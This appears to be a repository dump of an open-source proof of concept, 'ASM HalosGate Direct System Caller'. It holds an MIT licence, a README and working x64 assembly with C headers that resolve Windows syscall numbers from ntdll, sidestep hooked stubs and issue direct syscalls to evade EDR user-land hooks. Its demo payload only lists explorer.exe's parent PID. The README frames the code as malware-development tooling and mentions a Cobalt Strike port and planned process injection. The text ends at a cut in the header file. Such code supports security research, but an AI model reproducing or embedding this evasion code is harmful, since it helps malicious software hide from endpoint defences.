[
  {
    "path": "LICENSE.md",
    "content": "MIT License\n\nCopyright (c) 2023 Bobby Cooke\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n"
  },
  {
    "path": "README.md",
    "content": "# ASM HalosGate Direct System Caller\nAssembly HalosGate implementation that directly calls Windows system calls, evades EDR user-land hooks, and displays the PPID of the explorer.exe process.\n\n![](/imgs/asmHalosGatePoc.png)\n+ In this screenshot the \"NtQuerySystemInformation\" & \"NtAllocateVirtualMemory\" NTDLL.DLL system calls are discovered by using the HalosGate technique after failing to retrieve them via the HellsGate technique due to EDR user-land hooks.\n+ After the system calls are resolved via the HellsGate and HalosGate methods, they are called directly. The code in NTDLL is never executed.\n\n### To Do List\n+ Obfuscate the strings that are used for resolving the addresses of the NTDLL symbols\n  + Or use hashing\n+ ~Need to fix some bugs when switching from debug to release mode in Visual Studio~ (Fixed 05/08/21)\n+ ~Need to figure out how to properly overload the call to HellDescent()~ (Fixed 05/08/21)\n+ Clean up the assembly functions, they are messy and could be better (Some cleanup 05/08/21)\n+ ~Do better checking for the process image name so it doesn't conflict with other processes named explorer~ (Fixed 05/08/21)\n+ Better error handling (Some better handling 05/08/21)\n+ ~Make this into a Cobalt Strike beacon object file~ (Complete! 06/08/21)\n  + See the [HalosGate Processlist Cobalt Strike BOF](https://github.com/boku7/halosgate-ps) project! ;)\n+ Build on this project for process injection / syscall PS\n+ ~Use HalosGate to handle EDR hooks.~ (Implemented in this project on 05/08/21)\n\n### Credits / References\n+ Reenz0h from @SEKTOR7net (Creator of the HalosGate technique)\n  + This HalosGate project is based on the work of Reenz0h.\n  + Most of the C techniques I use are from Reenz0h's awesome courses and blogs\n  + Best classes for malware development out there.\n  + His work on HalosGate was the motivation for this project.\n  + https://blog.sektor7.net/#!res/2021/halosgate.md\n  + https://institute.sektor7.net/\n+ @smelly__vx & @am0nsec (Creators/Publishers of the Hells Gate technique)\n  + Could not have made my implementation of HellsGate without them :)\n  + Awesome work on this method, really enjoyed working through it myself. Thank you!\n  + https://github.com/am0nsec/HellsGate\n  + Link to the Hell's Gate paper: https://vxug.fakedoma.in/papers/VXUG/Exclusive/HellsGate.pdf\n+ Pavel Yosifovich (@zodiacon)\n  + I learned how to correctly call NtQuerySystemInformation from Pavel's class on Pentester Academy. Full credits to Pavel for this. (BTW, Pavel is an awesome teacher and I 100% recommend him.)\n  + [Windows Process Injection for Red-Blue Teams - Module 2: NTQuerySystemInformation](https://www.pentesteracademy.com/video?id=1634)\n"
  },
  {
    "path": "bcookesHalosGate.asm",
    "content": "; Author: Bobby Cooke @0xBoku | https://github.com/boku7 | https://0xBoku.com | https://www.linkedin.com/in/bobby-cooke/\r\n; Credits / References: Pavel Yosifovich (@zodiacon), Reenz0h from @SEKTOR7net, @smelly__vx & @am0nsec (Creators/Publishers of the Hells Gate technique)\r\n\r\n.code \r\n\r\ngetntdll PROC\r\n\txor rdi, rdi            ; RDI = 0x0\r\n\tmul rdi                 ; RAX&RDX =0x0\r\n\tmov rbx, gs:[rax+60h]   ; RBX = Address_of_PEB\r\n\tmov rbx, [rbx+18h]      ; RBX = Address_of_LDR\r\n\tmov rbx, [rbx+20h]      ; RBX = Ldr.InMemoryOrderModuleList.Flink (1st entry: the exe)\r\n\tmov rbx, [rbx]          ; RBX = 2nd entry in InMemoryOrderModuleList = ntdll.dll\r\n\tmov rbx, [rbx+20h]      ; RBX = &ntdll.dll ( Base Address of ntdll.dll)\r\n\tmov rax, rbx            ; RBX & RAX = &ntdll.dll\r\n\tret                     ; return to caller\r\ngetntdll ENDP\r\n\r\n; Get ExportTable Address of supplied module DLL\r\ngetExportTable PROC\r\n\tmov rbx, rcx            ; RBX = Supplied Module Address\r\n\tmov r8, rcx             ; R8  = Supplied Module Address\r\n\tmov ebx, [rbx+3Ch]      ; RBX = Offset NewEXEHeader\r\n\tadd rbx, r8             ; RBX = &ntdll.dll + Offset NewEXEHeader = &NewEXEHeader\r\n\txor rcx, rcx            ; Avoid null bytes from mov edx,[rbx+0x88] by using rcx register to add\r\n\tadd cx, 88ffh\r\n\tshr rcx, 8h             ; RCX = 0x88ff --> 0x88\r\n\tmov edx, [rbx+rcx]      ; EDX = [&NewEXEHeader + Offset RVA ExportTable] = RVA ExportTable\r\n\tadd rdx, r8             ; RDX = &ntdll.dll + RVA ExportTable = &ExportTable\r\n\tmov rax, rdx            ; RAX = &module.ExportTable\r\n\tret                     ; return to caller\r\ngetExportTable ENDP\r\n\r\n; Get &module.ExportTable.AddressTable from &module.ExportTable\r\ngetExAddressTable PROC\r\n\tmov r8, rdx             ; R8  = &module.dll\r\n\tmov rdx, rcx            ; RDX = &module.ExportTable\r\n\txor r10, r10\r\n\tmov r10d, [rdx+1Ch]     ; R10 = RVA AddressTable\r\n\tadd r10, r8             ; R10 = &AddressTable\r\n\tmov rax, r10            ; RAX = &module.ExportTable.AddressTable\r\n\tret                     ; return to caller\r\ngetExAddressTable ENDP\r\n\r\n; Get &module.NamePointerTable from &module.ExportTable\r\ngetExNamePointerTable PROC\r\n\tmov r8, rdx             ; R8  = &module.dll\r\n\tmov rdx, rcx            ; RDX = &module.ExportTable\r\n\txor r11, r11\r\n\tmov r11d, [rdx+20h]     ; R11 = [&ExportTable + Offset RVA Name PointerTable] = RVA NamePointerTable\r\n\tadd r11, r8             ; R11 = &NamePointerTable (Memory Address of module Export NamePointerTable)\r\n\tmov rax, r11            ; RAX = &module.ExportTable.NamePointerTable\r\n\tret                     ; return to caller\r\ngetExNamePointerTable ENDP\r\n\r\n; Get &OrdinalTable from ntdll.dll ExportTable\r\ngetExOrdinalTable PROC\r\n\tmov r8, rdx             ; R8  = &module.dll\r\n\tmov rdx, rcx            ; RDX = &module.ExportTable\r\n\txor r12, r12\r\n\tmov r12d, [rdx+24h]     ; R12 = RVA  OrdinalTable\r\n\tadd r12, r8             ; R12 = &OrdinalTable\r\n\tmov rax, r12            ; RAX = &module.ExportTable.OrdinalTable\r\n\tret                     ; return to caller\r\ngetExOrdinalTable ENDP\r\n\r\n; Get the address of the API from the module ExportTable\r\n; IN: RCX = API name length, RDX = &API name string, R8 = &Module, R9 = &Module.ExportTable.AddressTable, [RSP+28h] = &NamePointerTable, [RSP+30h] = &OrdinalTable\r\ngetApiAddr PROC\r\n\tmov r10, r9             ; R10 = &module.ExportTable.AddressTable\r\n\tmov r11, [rsp+28h]      ; R11 = &module.ExportTable.NamePointerTable\r\n\tmov r12, [rsp+30h]      ; R12 = &module.ExportTable.OrdinalTable\r\n\txor rax, rax            ; Setup Counter for resolving the API Address after finding the name string\r\n\tpush rcx                ; push the string length counter to stack\r\n\tjmp short getApiAddrLoop\r\ngetApiAddr ENDP\r\n\r\ngetApiAddrLoop PROC\r\n\tmov rcx, [rsp]          ; reset the string length counter from the stack\r\n\txor rdi, rdi            ; Clear RDI for setting up string name retrieval\r\n\tmov edi, [r11+rax*4]    ; EDI = RVA NameString = [&NamePointerTable + (Counter * 4)]\r\n\tadd rdi, r8             ; RDI = &NameString    = RVA NameString + &module.dll\r\n\tmov rsi, rdx            ; RSI = Address of API Name String to match on the Stack  (reset to start of string)\r\n\trepe cmpsb              ; Compare strings at RDI & RSI\r\n\tje getApiAddrFin        ; If match then we found the API string. Now we need to find the Address of the API\r\n\tinc rax\r\n\tjmp short getApiAddrLoop\r\ngetApiAddrLoop ENDP\r\n\r\n; Resolve the API address via the OrdinalTable using the final value of the Counter\r\ngetApiAddrFin PROC\r\n\tpop rcx                 ; remove string length counter from top of stack\r\n\tmov ax, [r12+rax*2]     ; RAX = [&OrdinalTable + (Counter*2)] = ordinalNumber of module.<API>\r\n\tmov eax, [r10+rax*4]    ; RAX = RVA API = [&AddressTable + API OrdinalNumber]\r\n\tadd rax, r8             ; RAX = module.<API> = RVA module.<API> + module.dll BaseAddress\r\n\tret                     ; return to API caller\r\ngetApiAddrFin ENDP\r\n\r\n; Find the syscall number for the NTDLL API with provided API address\r\n; RCX = NTDLL.<API> Address\r\nfindSyscallNumber PROC\r\n\txor rsi, rsi\r\n\txor rdi, rdi \r\n\tmov rsi, 00B8D18B4Ch   ; bytes at start of NTDLL stub to setup syscall in RAX\r\n\tmov edi, [rcx]         ; RDI = first 4 bytes of NTDLL API syscall stub (mov r10,rcx;mov eax,<syscall#>)\r\n\tcmp rsi, rdi\r\n\tjne error              ; if the bytes don't match then it's probably hooked. Exit gracefully\r\n\txor rax,rax            ; clear RAX as it will hold the syscall\r\n\tmov ax, [rcx+4]        ; The system call number\r\n\tret                    ; return to caller\r\nfindSyscallNumber ENDP\r\n\r\n; RCX = &NTDLL.<API> | RDX = Up Increment (multiplied by the 32-byte stub size below)\r\nhalosGateUp PROC\r\n\txor rsi, rsi\r\n\txor rdi, rdi \r\n\tmov rsi, 00B8D18B4Ch   ; bytes at start of NTDLL stub to setup syscall in RAX\r\n\txor rax, rax\r\n\tmov al, 20h            ; 32 = size of one syscall stub\r\n\tmul dx                 ; RAX = AX * DX = 32 * Up Increment\r\n\tadd rcx, rax           ; RCX = NTDLL.API + (32 * Up) = neighbouring syscall stub\r\n\tmov edi, [rcx]         ; RDI = first 4 bytes of NTDLL API syscall stub, incremented Up by HalosGate (mov r10, rcx; mov eax, <syscall#>)\r\n\tcmp rsi, rdi\r\n\tjne error              ; if the bytes don't match then it's probably hooked. Exit gracefully\r\n\txor rax,rax            ; clear RAX as it will hold the syscall\r\n\tmov ax, [rcx+4]        ; The system call number for the API close to the target\r\n\tret                    ; return to caller\r\nhalosGateUp ENDP\r\n\r\n; RCX = &NTDLL.<API> | RDX = Down Increment (multiplied by the 32-byte stub size below)\r\nhalosGateDown PROC\r\n\txor rsi, rsi\r\n\txor rdi, rdi \r\n\tmov rsi, 00B8D18B4Ch   ; bytes at start of NTDLL stub to setup syscall in RAX\r\n\txor rax, rax\r\n\tmov al, 20h            ; 32 = size of one syscall stub\r\n\tmul dx                 ; RAX = AX * DX = 32 * Down Increment\r\n\tsub rcx, rax           ; RCX = NTDLL.API - (32 * Down) = neighbouring syscall stub\r\n\tmov edi, [rcx]         ; RDI = first 4 bytes of NTDLL API syscall stub, decremented Down by HalosGate (mov r10, rcx; mov eax, <syscall#>)\r\n\tcmp rsi, rdi\r\n\tjne error              ; if the bytes don't match then it's probably hooked. Exit gracefully\r\n\txor rax,rax            ; clear RAX as it will hold the syscall\r\n\tmov ax, [rcx+4]        ; The system call number for the API close to the target\r\n\tret                    ; return to caller\r\nhalosGateDown ENDP\r\n\r\nerror PROC\r\n\txor rax, rax ; return 0 for error\r\n\tret          ; return to caller\r\nerror ENDP\r\n\r\nHellsGate PROC\r\n\txor r11, r11\r\n\tmov r11d, ecx           ; R11 = syscall number for the following HellDescent call\r\n\tret\r\nHellsGate ENDP\r\n\r\nHellDescent PROC\r\n\txor rax, rax\r\n\tmov r10, rcx\r\n\tmov eax, r11d           ; EAX = syscall number saved by HellsGate\r\n\tsyscall\r\n\tret\r\nHellDescent ENDP\r\n\r\n; RCX = &ImageName buffer (UTF-16). Returns RAX = 1 if it is \"explorer.exe\", 0 otherwise\r\ncompExplorer PROC\r\n\txor rsi, rsi\r\n\tcmp rsi, rcx\r\n\tje error                   ; This is a null entry, skip this one\r\n\tmov rsi, 6c007000780065h   ; unicode \"expl\"\r\n\tmov rdx, [rcx]             ; move the first 4 characters of the string into the RDX register\r\n\tcmp rsi, rdx\r\n\tjne error                  ; if the bytes don't match it's not \"expl\", try the next one\r\n\tmov rsi, 7200650072006fh   ;  6f 00 72 00 65 00 72 00  o.r.e.r.\r\n\tmov rdx, [rcx+8h]          ; move the next 4 characters of the string into the RDX register \"orer\"\r\n\tcmp rsi, rdx\r\n\tjne error                  ; if the bytes don't match it's not \"explorer\", try the next one\r\n\tmov rsi, 6500780065002eh   ; 2e 00 65 00 78 00 65 00  ..e.x.e.\r\n\tmov rdx, [rcx+10h]         ; move the next 4 characters of the string into the RDX register \".exe\"\r\n\tcmp rsi, rdx\r\n\tjne error                  ; if the bytes don't match it's not \"explorer.exe\", try the next one\r\n\tmov rax, 1h                ; found \"explorer.exe\" return true\r\n\tret\r\ncompExplorer ENDP\r\n\r\nend\r\n"
  },
  {
    "path": "bcookesHalosGate.h",
    "content": "#define RTL_MAX_DRIVE_LETTERS 32\r\n\r\ntypedef struct _UNICODE_STRING\r\n{\r\n\tUSHORT Length;\r\n\tUSHORT MaximumLength;\r\n\tPWSTR  Buffer;\r\n} UNICODE_STRING, * PUNICODE_STRING;\r\n\r\ntypedef struct _PS_ATTRIBUTE\r\n{\r\n\tULONG  Attribute;\r\n\tSIZE_T Size;\r\n\tunion\r\n\t{\r\n\t\tULONG Value;\r\n\t\tPVOID ValuePtr;\r\n\t} u1;\r\n\tPSIZE_T ReturnLength;\r\n} PS_ATTRIBUTE, * PPS_ATTRIBUTE;\r\n\r\n#define STATUS_BUFFER_TOO_SMALL 0xC0000004\r\n\r\ntypedef struct _RTL_DRIVE_LETTER_CURDIR {\r\n\tUSHORT                  Flags;\r\n\tUSHORT                  Length;\r\n\tULONG                   TimeStamp;\r\n\tUNICODE_STRING          DosPath;\r\n} RTL_DRIVE_LETTER_CURDIR, * PRTL_DRIVE_LETTER_CURDIR;\r\n\r\ntypedef struct _CURDIR\r\n{\r\n\tUNICODE_STRING DosPath;\r\n\tPVOID Handle;\r\n} CURDIR, * PCURDIR;\r\n\r\n\r\ntypedef struct _RTL_USER_PROCESS_PARAMETERS\r\n{\r\n\tULONG MaximumLength;\r\n\tULONG Length;\r\n\r\n\tULONG Flags;\r\n\tULONG DebugFlags;\r\n\r\n\tHANDLE ConsoleHandle;\r\n\tULONG ConsoleFlags;\r\n\tHANDLE StandardInput;\r\n\tHANDLE StandardOutput;\r\n\tHANDLE StandardError;\r\n\r\n\tCURDIR CurrentDirectory;\r\n\tUNICODE_STRING DllPath;\r\n\tUNICODE_STRING ImagePathName;\r\n\tUNICODE_STRING CommandLine;\r\n\tPVOID Environment;\r\n\r\n\tULONG StartingX;\r\n\tULONG StartingY;\r\n\tULONG CountX;\r\n\tULONG CountY;\r\n\tULONG CountCharsX;\r\n\tULONG CountCharsY;\r\n\tULONG FillAttribute;\r\n\r\n\tULONG WindowFlags;\r\n\tULONG ShowWindowFlags;\r\n\tUNICODE_STRING WindowTitle;\r\n\tUNICODE_STRING DesktopInfo;\r\n\tUNICODE_STRING ShellInfo;\r\n\tUNICODE_STRING RuntimeData;\r\n\tRTL_DRIVE_LETTER_CURDIR CurrentDirectories[RTL_MAX_DRIVE_LETTERS];\r\n\r\n\tULONG EnvironmentSize;\r\n\tULONG EnvironmentVersion;\r\n\tPVOID PackageDependencyData;\r\n\tULONG ProcessGroupId;\r\n\tULONG LoaderThreads;\r\n} RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS;\r\n\r\ntypedef enum _PS_CREATE_STATE\r\n{\r\n\tPsCreateInitialState,\r\n\tPsCreateFailOnFileOpen,\r\n\tPsCreateFailOnSectionCreate,\r\n\tPsCreateFailExeFormat,\r\n\tPsCreateFailMachineMismatch,\r\n\tPsCreateFailExeName,\r\n\tPsCreateSuccess,\r\n\tPsCreateMaximumStates\r\n} PS_CREATE_STATE, * PPS_CREATE_STATE;\r\n\r\ntypedef struct _OBJECT_ATTRIBUTES\r\n{\r\n\tULONG           Length;\r\n\tHANDLE          RootDirectory;\r\n\tPUNICODE_STRING ObjectName;\r\n\tULONG           Attributes;\r\n\tPVOID           SecurityDescriptor;\r\n\tPVOID           SecurityQualityOfService;\r\n} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;\r\n\r\ntypedef struct _PS_CREATE_INFO\r\n{\r\n\tSIZE_T Size;\r\n\tPS_CREATE_STATE State;\r\n\tunion\r\n\t{\r\n\t\t// PsCreateInitialState\r\n\t\tstruct {\r\n\t\t\tunion {\r\n\t\t\t\tULONG InitFlags;\r\n\t\t\t\tstruct {\r\n\t\t\t\t\tUCHAR  WriteOutputOnExit : 1;\r\n\t\t\t\t\tUCHAR  DetectManifest : 1;\r\n\t\t\t\t\tUCHAR  IFEOSkipDebugger : 1;\r\n\t\t\t\t\tUCHAR  IFEODoNotPropagateKeyState : 1;\r\n\t\t\t\t\tUCHAR  SpareBits1 : 4;\r\n\t\t\t\t\tUCHAR  SpareBits2 : 8;\r\n\t\t\t\t\tUSHORT ProhibitedImageCharacteristics : 16;\r\n\t\t\t\t};\r\n\t\t\t};\r\n\t\t\tACCESS_MASK AdditionalFileAccess;\r\n\t\t} InitState;\r\n\t\t// PsCreateFailOnSectionCreate\r\n\t\tstruct {\r\n\t\t\tHANDLE FileHandle;\r\n\t\t} FailSection;\r\n\t\t// PsCreateFailExeFormat\r\n\t\tstruct {\r\n\t\t\tUSHORT DllCharacteristics;\r\n\t\t} ExeFormat;\r\n\t\t// PsCreateFailExeName\r\n\t\tstruct {\r\n\t\t\tHANDLE IFEOKey;\r\n\t\t} ExeName;\r\n\t\t// PsCreateSuccess\r\n\t\tstruct {\r\n\t\t\tunion {\r\n\t\t\t\tULONG OutputFlags;\r\n\t\t\t\tstruct {\r\n\t\t\t\t\tUCHAR  ProtectedProcess : 1;\r\n\t\t\t\t\tUCHAR  AddressSpaceOverride : 1;\r\n\t\t\t\t\tUCHAR  DevOverrideEnabled : 1; // from Image File Execution Options\r\n\t\t\t\t\tUCHAR  ManifestDetected : 1;\r\n\t\t\t\t\tUCHAR  ProtectedProcessLight : 1;\r\n\t\t\t\t\tUCHAR  SpareBits1 : 3;\r\n\t\t\t\t\tUCHAR  SpareBits2 : 8;\r\n\t\t\t\t\tUSHORT SpareBits3 : 16;\r\n\t\t\t\t};\r\n\t\t\t};\r\n\t\t\tHANDLE    FileHandle;\r\n\t\t\tHANDLE    SectionHandle;\r\n\t\t\tULONGLONG UserProcessParametersNative;\r\n\t\t\tULONG     UserProcessParametersWow64;\r\n\t\t\tULONG     CurrentParameterFlags;\r\n\t\t\tULONGLONG PebAddressNative;\r\n\t\t\tULONG     PebAddressWow64;\r\n\t\t\tULONGLONG ManifestAddress;\r\n\t\t\tULONG     ManifestSize;\r\n\t\t} SuccessState;\r\n\t};\r\n} PS_CREATE_INFO, * PPS_CREATE_INFO;\r\n\r\ntypedef struct _PS_ATTRIBUTE_LIST\r\n{\r\n\tSIZE_T       TotalLength;\r\n\tPS_ATTRIBUTE Attributes[1];\r\n} PS_ATTRIBUTE_LIST, * PPS_ATTRIBUTE_LIST;\r\n\r\n\r\ntypedef enum _KWAIT_REASON\r\n{\r\n\tExecutive = 0,\r\n\tFreePage = 1,\r\n\tPageIn = 2,\r\n\tPoolAllocation = 3,\r\n\tDelayExecution = 4,\r\n\tSuspended = 5,\r\n\tUserRequest = 6,\r\n\tWrExecutive = 7,\r\n\tWrFreePage = 8,\r\n\tWrPageIn = 9,\r\n\tWrPoolAllocation = 10,\r\n\tWrDelayExecution = 11,\r\n\tWrSuspended = 12,\r\n\tWrUserRequest = 13,\r\n\tWrEventPair = 14,\r\n\tWrQueue = 15,\r\n\tWrLpcReceive = 16,\r\n\tWrLpcReply = 17,\r\n\tWrVirtualMemory = 18,\r\n\tWrPageOut = 19,\r\n\tWrRendezvous = 20,\r\n\tSpare2 = 21,\r\n\tSpare3 = 22,\r\n\tSpare4 = 23,\r\n\tSpare5 = 24,\r\n\tWrCalloutStack = 25,\r\n\tWrKernel = 26,\r\n\tWrResource = 27,\r\n\tWrPushLock = 28,\r\n\tWrMutex = 29,\r\n\tWrQuantumEnd = 30,\r\n\tWrDispatchInt = 31,\r\n\tWrPreempted = 32,\r\n\tWrYieldExecution = 33,\r\n\tWrFastMutex = 34,\r\n\tWrGuardedMutex = 35,\r\n\tWrRundown = 36,\r\n\tMaximumWaitReason = 37\r\n} KWAIT_REASON;\r\n\r\ntypedef LONG KPRIORITY;\r\n\r\ntypedef struct _CLIENT_ID\r\n{\r\n\tHANDLE UniqueProcess;\r\n\tHANDLE UniqueThread;\r\n} CLIENT_ID, * PCLIENT_ID;\r\n\r\ntypedef struct _SYSTEM_THREAD_INFORMATION\r\n{\r\n\tLARGE_INTEGER KernelTime;\r\n\tLARGE_INTEGER UserTime;\r\n\tLARGE_INTEGER CreateTime;\r\n\tULONG WaitTime;\r\n\tPVOID StartAddress;\r\n\tCLIENT_ID ClientId;\r\n\tKPRIORITY Priority;\r\n\tLONG BasePriority;\r\n\tULONG ContextSwitches;\r\n\tULONG ThreadState;\r\n\tKWAIT_REASON WaitReason;\r\n} SYSTEM_THREAD_INFORMATION, * PSYSTEM_THREAD_INFORMATION;\r\n\r\n\r\ntypedef struct _SYSTEM_PROCESS_INFORMATION\r\n{\r\n\tULONG NextEntryOffset;\r\n\tULONG NumberOfThreads;\r\n\tLARGE_INTEGER WorkingSetPrivateSize; // since VISTA\r\n\tULONG HardFaultCount; // since WIN7\r\n\tULONG NumberOfThreadsHighWatermark; // since WIN7\r\n\tULONGLONG CycleTime; // since WIN7\r\n\tLARGE_INTEGER CreateTime;\r\n\tLARGE_INTEGER UserTime;\r\n\tLARGE_INTEGER KernelTime;\r\n\tUNICODE_STRING ImageName;\r\n\tKPRIORITY BasePriority;\r\n\tHANDLE UniqueProcessId;\r\n\tHANDLE InheritedFromUniqueProcessId;\r\n\tULONG HandleCount;\r\n\tULONG SessionId;\r\n\tULONG_PTR UniqueProcessKey; // since VISTA (requires SystemExtendedProcessInformation)\r\n\tSIZE_T PeakVirtualSize;\r\n\tSIZE_T VirtualSize;\r\n\tULONG PageFaultCount;\r\n\tSIZE_T PeakWorkingSetSize;\r\n\tSIZE_T WorkingSetSize;\r\n\tSIZE_T QuotaPeakPagedPoolUsage;\r\n\tSIZE_T QuotaPagedPoolUsage;\r\n\tSIZE_T QuotaPeakNonPagedPoolUsage;\r\n\tSIZE_T QuotaNonPagedPoolUsage;\r\n\tSIZE_T PagefileUsage;\r\n\tSIZE_T PeakPagefileUsage;\r\n\tSIZE_T PrivatePageCount;\r\n\tLARGE_INTEGER ReadOperationCount;\r\n\tLARGE_INTEGER WriteOperationCount;\r\n\tLARGE_INTEGER OtherOperationCount;\r\n\tLARGE_INTEGER ReadTransferCount;\r\n\tLARGE_INTEGER WriteTransferCount;\r\n\tLARGE_INTEGER OtherTransferCount;\r\n\tSYSTEM_THREAD_INFORMATION Threads[1];\r\n} SYSTEM_PROCESS_INFORMATION, * PSYSTEM_PROCESS_INFORMATION;\r\n\r\n// source:http://www.microsoft.com/whdc/system/Sysinternals/MoreThan64proc.mspx\r\n// https://processhacker.sourceforge.io/doc/ntexapi_8h_source.html#l01202\r\ntypedef enum _SYSTEM_INFORMATION_CLASS\r\n{\r\n\tSystemBasicInformation, // q: SYSTEM_BASIC_INFORMATION\r\n\tSystemProcessorInformation, // q: SYSTEM_PROCESSOR_INFORMATION\r\n\tSystemPerformanceInformation, // q: SYSTEM_PERFORMANCE_INFORMATION\r\n\tSystemTimeOfDayInformation, // q: SYSTEM_TIMEOFDAY_INFORMATION\r\n\tSystemPathInformation, // not implemented\r\n\tSystemProcessInformation, // q: SYSTEM_PROCESS_INFORMATION\r\n\tSystemCallCountInformation, // q: SYSTEM_CALL_COUNT_INFORMATION\r\n\tSystemDeviceInformation, // q: SYSTEM_DEVICE_INFORMATION\r\n\tSystemProcessorPerformanceInformation, // q: SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION\r\n\tSystemFlagsInformation, // q: SYSTEM_FLAGS_INFORMATION\r\n\tSystemCallTimeInformation, // 10, not implemented\r\n\tSystemModuleInformation, // q: RTL_PROCESS_MODULES\r\n\tSystemLocksInformation,\r\n\tSystemStackTraceInformation,\r\n\tSystemPagedPoolInformation, // not implemented\r\n\tSystemNonPagedPoolInformation, // not implemented\r\n\tSystemHandleInformation, // q: SYSTEM_HANDLE_INFORMATION\r\n\tSystemObjectInformation, // q: SYSTEM_OBJECTTYPE_INFORMATION mixed with SYSTEM_OBJECT_INFORMATION\r\n\tSystemPageFileInformation, // q: SYSTEM_PAGEFILE_INFORMATION\r\n\tSystemVdmInstemulInformation, // q\r\n\tSystemVdmBopInformation, // 20, not implemented\r\n\tSystemFileCacheInformation, // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (info for WorkingSetTypeSystemCache)\r\n\tSystemPoolTagInformation, // q: SYSTEM_POOLTAG_INFORMATION\r\n\tSystemInterruptInformation, // q: SYSTEM_INTERRUPT_INFORMATION\r\n\tSystemDpcBehaviorInformation, // q: SYSTEM_DPC_BEHAVIOR_INFORMATION; s: SYSTEM_DPC_BEHAVIOR_INFORMATION (requires SeLoadDriverPrivilege)\r\n\tSystemFullMemoryInformation, // not implemented\r\n\tSystemLoadGdiDriverInformation, // s (kernel-mode only)\r\n\tSystemUnloadGdiDriverInformation, // s (kernel-mode only)\r\n\tSystemTimeAdjustmentInformation, // q: SYSTEM_QUERY_TIME_ADJUST_INFORMATION; s: SYSTEM_SET_TIME_ADJUST_INFORMATION (requires SeSystemtimePrivilege)\r\n\tSystemSummaryMemoryInformation, // not implemented\r\n\tSystemMirrorMemoryInformation, // 30, s (requires license value \"Kernel-MemoryMirroringSupported\") (requires SeShutdownPrivilege)\r\n\tSystemPerformanceTraceInformation, // s\r\n\tSystemObsolete0, // not implemented\r\n\tSystemExceptionInformation, // q: SYSTEM_EXCEPTION_INFORMATION\r\n\tSystemCrashDumpStateInformation, // s (requires SeDebugPrivilege)\r\n\tSystemKernelDebuggerInformation, // q: SYSTEM_KERNEL_DEBUGGER_INFORMATION\r\n\tSystemContextSwitchInformation, // q: SYSTEM_CONTEXT_SWITCH_INFORMATION\r\n\tSystemRegistryQuotaInformation, // q: SYSTEM_REGISTRY_QUOTA_INFORMATION; s (requires SeIncreaseQuotaPrivilege)\r\n\tSystemExtendServiceTableInformation, // s (requires SeLoadDriverPrivilege) // loads win32k only\r\n\tSystemPrioritySeperation, // s (requires SeTcbPrivilege)\r\n\tSystemVerifierAddDriverInformation, // 40, s (requires SeDebugPrivilege)\r\n\tSystemVerifierRemoveDriverInformation, // s (requires SeDebugPrivilege)\r\n\tSystemProcessorIdleInformation, // q: SYSTEM_PROCESSOR_IDLE_INFORMATION\r\n\tSystemLegacyDriverInformation, // q: SYSTEM_LEGACY_DRIVER_INFORMATION\r\n\tSystemCurrentTimeZoneInformation, // q\r\n\tSystemLookasideInformation, // q: SYSTEM_LOOKASIDE_INFORMATION\r\n\tSystemTimeSlipNotification, // s (requires SeSystemtimePrivilege)\r\n\tSystemSessionCreate, // not implemented\r\n\tSystemSessionDetach, // not implemented\r\n\tSystemSessionInformation, // not implemented\r\n\tSystemRangeStartInformation, // 50, q\r\n\tSystemVerifierInformation, // q: SYSTEM_VERIFIER_INFORMATION; s (requires SeDebugPrivilege)\r\n\tSystemVerifierThunkExtend, // s (kernel-mode only)\r\n\tSystemSessionProcessInformation, // q: SYSTEM_SESSION_PROCESS_INFORMATION\r\n\tSystemLoadGdiDriverInSystemSpace, // s (kernel-mode only) (same as SystemLoadGdiDriverInformation)\r\n\tSystemNumaProcessorMap, // q\r\n\tSystemPrefetcherInformation, // q: PREFETCHER_INFORMATION; s: PREFETCHER_INFORMATION // PfSnQueryPrefetcherInformation\r\n\tSystemExtendedProcessInformation, // q: SYSTEM_PROCESS_INFORMATION\r\n\tSystemRecommendedSharedDataAlignment, // q\r\n\tSystemComPlusPackage, // q; s\r\n\tSystemNumaAvailableMemory, // 60\r\n\tSystemProcessorPowerInformation, // q: SYSTEM_PROCESSOR_POWER_INFORMATION\r\n\tSystemEmulationBasicInformation, // q\r\n\tSystemEmulationProcessorInformation,\r\n\tSystemExtendedHandleInformation, // q: SYSTEM_HANDLE_INFORMATION_EX\r\n\tSystemLostDelayedWriteInformation, // q: ULONG\r\n\tSystemBigPoolInformation, // q: SYSTEM_BIGPOOL_INFORMATION\r\n\tSystemSessionPoolTagInformation, // q: SYSTEM_SESSION_POOLTAG_INFORMATION\r\n\tSystemSessionMappedViewInformation, // q: SYSTEM_SESSION_MAPPED_VIEW_INFORMATION\r\n\tSystemHotpatchInformation, // q; s\r\n\tSystemObjectSecurityMode, // 70, q\r\n\tSystemWatchdogTimerHandler, // s (kernel-mode only)\r\n\tSystemWatchdogTimerInformation, // q (kernel-mode only); s (kernel-mode only)\r\n\tSystemLogicalProcessorInformation, // q: SYSTEM_LOGICAL_PROCESSOR_INFORMATION\r\n\tSystemWow64SharedInformationObsolete, // not implemented\r\n\tSystemRegisterFirmwareTableInformationHandler, // s (kernel-mode only)\r\n\tSystemFirmwareTableInformation, // not implemented\r\n\tSystemModuleInformationEx, // q: RTL_PROCESS_MODULE_INFORMATION_EX\r\n\tSystemVerifierTriageInformation, // not implemented\r\n\tSystemSuperfetchInformation, // q: SUPERFETCH_INFORMATION; s: SUPERFETCH_INFORMATION // 